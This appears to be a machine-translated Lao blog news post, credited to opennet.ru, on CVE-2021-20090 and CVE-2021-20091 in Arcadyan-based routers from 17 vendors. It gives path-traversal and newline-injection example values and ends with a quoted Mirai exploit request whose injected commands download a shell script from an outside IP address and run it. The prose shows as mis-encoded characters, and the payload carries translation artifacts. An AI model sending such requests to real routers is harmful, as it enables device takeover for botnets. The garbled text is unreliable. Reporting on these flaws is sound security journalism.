ProHoster > ะ‘ะปะพะณ > เบ‚เปˆเบฒเบงโ€‹เบญเบดเบ™โ€‹เป€เบ•เบตโ€‹เป€เบ™เบฑเบ”โ€‹ > เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปƒเบ™ routers เป€เบฎเบทเบญเบ™เบชเบปเปˆเบ‡เบœเบปเบ™เบเบฐเบ—เบปเบšเบ•เปเปˆเบœเบนเป‰เบœเบฐเบฅเบดเบ” 17 เบ„เบปเบ™

เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปƒเบ™ routers เป€เบฎเบทเบญเบ™เบชเบปเปˆเบ‡เบœเบปเบ™เบเบฐเบ—เบปเบšเบ•เปเปˆเบœเบนเป‰เบœเบฐเบฅเบดเบ” 17 เบ„เบปเบ™

เบเบฒเบ™เป‚เบˆเบกเบ•เบตเบ„เบฑเป‰เบ‡เปƒเบซเบเปˆเป„เบ”เป‰เบ–เบทเบเบšเบฑเบ™เบ—เบถเบเป„เบงเป‰เปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบเบ•เปเปˆเบเบฑเบš routers เปƒเบ™เบšเป‰เบฒเบ™เบ—เบตเปˆเป€เบŸเบตเบกเปเบงเปƒเบŠเป‰ HTTP server เบˆเบฒเบเบšเปเบฅเบดเบชเบฑเบ” Arcadyan. เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ„เบงเบšเบ„เบธเบกเบญเบธเบ›เบฐเบเบญเบ™, เบเบฒเบ™เบ›เบฐเบชเบปเบกเบ›เบฐเบชเบฒเบ™เบ‚เบญเบ‡เบชเบญเบ‡เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปเบกเปˆเบ™เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เบ—เบตเปˆเบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบ›เบฐเบ•เบดเบšเบฑเบ”เป„เบฅเบเบฐเป„เบเบ‚เบญเบ‡เบฅเบฐเบซเบฑเบ” arbitrary เบเบฑเบšเบชเบดเบ”เบ—เบดเบ‚เบญเบ‡เบฎเบฒเบ. เบšเบฑเบ™เบซเบฒเบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบชเบปเปˆเบ‡เบœเบปเบ™เบเบฐเบ—เบปเบšเบ•เปเปˆ routers ADSL เบ—เบตเปˆเบ‚เป‰เบญเบ™เบ‚เป‰เบฒเบ‡เบเบงเป‰เบฒเบ‡เบˆเบฒเบ Arcadyan, ASUS เปเบฅเบฐ Buffalo, เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™เบเบฑเบšเบญเบธเบ›เบฐเบเบญเบ™เบ—เบตเปˆเบชเบฐเบซเบ™เบญเบ‡เบžเบฒเบเปƒเบ•เป‰เบเบตเปˆเบซเปเป‰ Beeline (เบšเบฑเบ™เบซเบฒเป„เบ”เป‰เบ–เบทเบเบขเบทเบ™เบขเบฑเบ™เปƒเบ™ Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone เปเบฅเบฐ. เบœเบนเป‰เบ›เบฐเบเบญเบšเบเบฒเบ™เป‚เบ—เบฅเบฐเบ„เบปเบกเบญเบทเปˆเบ™เป†. เบกเบฑเบ™เป„เบ”เป‰เบ–เบทเบเบชเบฑเบ‡เป€เบเบ”เป€เบซเบฑเบ™เบงเปˆเบฒเบšเบฑเบ™เบซเบฒเบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบกเบตเบขเบนเปˆเปƒเบ™เป€เบŸเบตเบกเปเบง Arcadyan เบชเปเบฒเบฅเบฑเบšเบซเบผเบฒเบเบเบงเปˆเบฒ 10 เบ›เบตเปเบฅเบฐเปƒเบ™เบฅเบฐเบซเบงเปˆเบฒเบ‡เป€เบงเบฅเบฒเบ™เบตเป‰เป„เบ”เป‰เบ–เบทเบเบ„เบธเป‰เบกเบ„เบญเบ‡เป€เบžเบทเปˆเบญเบเป‰เบฒเบเบญเบญเบเป„เบ›เบขเปˆเบฒเบ‡เบซเบ™เป‰เบญเบ 20 เปเบšเบšเบญเบธเบ›เบฐเบเบญเบ™เบˆเบฒเบ 17 เบœเบนเป‰เบœเบฐเบฅเบดเบ”เบ—เบตเปˆเปเบ•เบเบ•เปˆเบฒเบ‡เบเบฑเบ™.

เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเบ—เบณเบญเบดเบ”, CVE-2021-20090, เป€เบฎเบฑเบ”เปƒเบซเป‰เบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰เปƒเบ™เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบชเบฐเบ„เบฃเบดเบšเบชเปˆเบงเบ™เบ•เบดเบ”เบ•เปเปˆเป€เบงเบฑเบšเปƒเบ”เป† เป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบเบงเบ”เบชเบญเบšเบ„เบงเบฒเบกเบ–เบทเบเบ•เป‰เบญเบ‡. เป‚เบ”เบเป€เบ™เบทเป‰เบญเปเบ—เป‰เปเบฅเป‰เบงเบ‚เบญเบ‡เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปเบกเปˆเบ™เบงเปˆเบฒเปƒเบ™เบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบšเป€เบงเบฑเบšเป„เบŠเบ•เปŒ, เบšเบฒเบ‡เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ—เบตเปˆเบœเปˆเบฒเบ™เบฎเบนเบšเบžเบฒเบš, เป„เบŸเบฅเปŒ CSS เปเบฅเบฐ scripts JavaScript เบ–เบทเบเบชเบปเปˆเบ‡เปเบกเปˆเบ™เบชเบฒเบกเบฒเบ”เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบ”เป‰เป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบเบงเบ”เบชเบญเบšเบ„เบงเบฒเบกเบ–เบทเบเบ•เป‰เบญเบ‡. เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ™เบตเป‰, เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ—เบตเปˆเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบžเบดเบชเบนเบ”เบขเบทเบ™เบขเบฑเบ™เปเบกเปˆเบ™เบ–เบทเบเบเบงเบ”เบชเบญเบšเป‚เบ”เบเปƒเบŠเป‰เบซเบ™เป‰เบฒเบเบฒเบเป€เบšเบทเป‰เบญเบ‡เบ•เบปเป‰เบ™. เบเบฒเบ™เบฅเบฐเบšเบธ โ€œ../โ€ เบ•เบปเบงเบญเบฑเบเบชเบญเบ™เปƒเบ™เป€เบชเบฑเป‰เบ™เบ—เบฒเบ‡เบ—เบตเปˆเบˆเบฐเป„เบ›เบซเบฒเป„เบ”เป€เบฃเบฑเบเบ—เปเบฃเบตเปเบกเปˆเปเบกเปˆเบ™เบ–เบทเบเบšเบฅเบฑเบญเบเป‚เบ”เบเป€เบŸเบตเบกเปเบง, เปเบ•เปˆเบเบฒเบ™เปƒเบŠเป‰เบเบฒเบ™เบ›เบฐเบชเบปเบกเบ›เบฐเบชเบฒเบ™ โ€œ..%2fโ€ เบ–เบทเบเบ‚เป‰เบฒเบกเป„เบ›. เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰เบ—เบตเปˆเบˆเบฐเป€เบ›เบตเบ”เบซเบ™เป‰เบฒเบ—เบตเปˆเบ›เป‰เบญเบ‡เบเบฑเบ™เปƒเบ™เป€เบงเบฅเบฒเบชเบปเปˆเบ‡เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเป€เบŠเบฑเปˆเบ™ "http://192.168.1.1/images/..%2findex.htm".

เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเบ—เบตเบชเบญเบ‡, CVE-2021-20091, เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบœเบนเป‰เปƒเบŠเป‰เบ—เบตเปˆเบกเบตเบเบฒเบ™เบเบงเบ”เบชเบญเบšเบ„เบงเบฒเบกเบ–เบทเบเบ•เป‰เบญเบ‡เบชเบฒเบกเบฒเบ”เบ›เปˆเบฝเบ™เปเบ›เบ‡เบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒเบฅเบฐเบšเบปเบšเบ‚เบญเบ‡เบญเบธเบ›เบฐเบเบญเบ™เป‚เบ”เบเบเบฒเบ™เบชเบปเปˆเบ‡เบžเบฒเบฅเบฒเบกเบดเป€เบ•เบตเบ—เบตเปˆเบกเบตเบฎเบนเบšเปเบšเบšเบžเบดเป€เบชเบ”เป„เบ›เบซเบฒเบชเบฐเบ„เบดเบš apply_abstract.cgi, เป€เบŠเบดเปˆเบ‡เบšเปเปˆเป„เบ”เป‰เบเบงเบ”เป€เบšเบดเปˆเบ‡เบงเปˆเบฒเบกเบตเบ•เบปเบงเบญเบฑเบเบชเบญเบ™เปเบ–เบงเปƒเปเปˆเบขเบนเปˆเปƒเบ™เบžเบฒเบฅเบฒเบกเบดเป€เบ•เบต. . เบ•เบปเบงเบขเปˆเบฒเบ‡, เป€เบกเบทเปˆเบญเบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™ ping, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบชเบฒเบกเบฒเบ”เบฅเบฐเบšเบธเบ„เปˆเบฒ โ€œ192.168.1.2%0AARC_SYS_TelnetdEnable=1โ€ เปƒเบ™เบŠเปˆเบญเบ‡เบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเบกเบตเบ—เบตเปˆเบขเบนเปˆ IP เบ–เบทเบเบเบงเบ”เบชเบญเบš, เปเบฅเบฐเบชเบฐเบ„เบฃเบดเบš, เป€เบกเบทเปˆเบญเบชเป‰เบฒเบ‡เป„เบŸเบฅเปŒเบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒ /tmp/etc/config/ .glbcfg, เบˆเบฐเบ‚เบฝเบ™เปเบ–เบง โ€œAARC_SYS_TelnetdEnable=1โ€ เปƒเบชเปˆเปƒเบ™เบกเบฑเบ™โ€, เป€เบŠเบดเปˆเบ‡เป€เบ›เบตเบ”เปƒเบŠเป‰เป€เบŠเบตเบšเป€เบงเบต telnetd, เป€เบŠเบดเปˆเบ‡เบชเบฐเปœเบญเบ‡เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเปƒเบŠเป‰ shell เบ„เบณเบชเบฑเปˆเบ‡เบ—เบตเปˆเบšเปเปˆเบˆเบณเบเบฑเบ”เบ”เป‰เบงเบเบชเบดเบ”เบฎเบฒเบ. เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™, เป‚เบ”เบเบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒเบžเบฒเบฅเบฒเบกเบดเป€เบ•เบต AARC_SYS, เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เบฅเบฐเบซเบฑเบ”เปƒเบ”เป†เปƒเบ™เบฅเบฐเบšเบปเบš. เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเบ—เปเบฒเบญเบดเบ”เป€เบฎเบฑเบ”เปƒเบซเป‰เบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰เบ—เบตเปˆเบˆเบฐเปเบฅเปˆเบ™เบชเบฐเบ„เบฃเบดเบšเบ—เบตเปˆเบกเบตเบšเบฑเบ™เบซเบฒเป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบžเบดเบชเบนเบ”เบขเบทเบ™เบขเบฑเบ™เป‚เบ”เบเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบกเบฑเบ™เป€เบ›เบฑเบ™ โ€œ/images/..%2fapply_abstract.cgiโ€.

เป€เบžเบทเปˆเบญเบ‚เบนเบ”เบฎเบตเบ”เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆ, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบˆเบฐเบ•เป‰เบญเบ‡เบชเบฒเบกเบฒเบ”เบชเบปเปˆเบ‡เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเป„เบ›เบเบฑเบ‡เบœเบญเบ”เป€เบ„เบทเบญเบ‚เปˆเบฒเบเบ—เบตเปˆเบญเบดเบ™เป€เบ•เบตเป€เบŸเบ”เป€เบงเบฑเบšเบเบณเบฅเบฑเบ‡เปเบฅเปˆเบ™เบขเบนเปˆ. เบเบฒเบ™เบ•เบฑเบ”เบชเบดเบ™เป‚เบ”เบเบ™เบฐเป‚เบเบšเบฒเบเบ”เป‰เบฒเบ™เบเบฒเบ™เปเบœเปˆเบเบฐเบˆเบฒเบเบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบต, เบœเบนเป‰เบ›เบฐเบเบญเบšเบเบฒเบ™เบˆเปเบฒเบ™เบงเบ™เบซเบผเบฒเบเบญเบญเบเบˆเบฒเบเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบญเบธเบ›เบฐเบเบญเบ™เบ‚เบญเบ‡เป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒเบˆเบฒเบเป€เบ„เบทเบญเบ‚เปˆเบฒเบเบžเบฒเบเบ™เบญเบเป€เบžเบทเปˆเบญเบ‡เปˆเบฒเบเบเบฒเบ™เบงเบดเบ™เบดเบ”เป„เบชเบšเบฑเบ™เบซเบฒเป‚เบ”เบเบเบฒเบ™เบšเปเบฅเบดเบเบฒเบ™เบชเบฐเบซเบ™เบฑเบšเบชเบฐเบซเบ™เบนเบ™. เบ–เป‰เบฒเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบญเบดเบ™เป€เบ•เบตเป€เบŸเบ”เบ–เบทเบเบˆเปเบฒเบเบฑเบ”เบžเบฝเบ‡เปเบ•เปˆเปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบเบžเบฒเบเปƒเบ™, เบเบฒเบ™เป‚เบˆเบกเบ•เบตเบชเบฒเบกเบฒเบ”เบ–เบทเบเบ›เบฐเบ•เบดเบšเบฑเบ”เบˆเบฒเบเป€เบ„เบทเบญเบ‚เปˆเบฒเบเบžเบฒเบเบ™เบญเบเป‚เบ”เบเปƒเบŠเป‰เป€เบ•เบฑเบเบ™เบดเบ "เบเบฒเบ™เบœเบนเบเบกเบฑเบ” DNS". เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเป„เบ”เป‰เบ–เบทเบเบ™เบณเปƒเบŠเป‰เบขเปˆเบฒเบ‡เบˆเบดเบ‡เบˆเบฑเบ‡เป€เบžเบทเปˆเบญเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ routers เบเบฑเบš Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 เบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh ; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: opennet.ru

เป€เบžเบตเปˆเบกเบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™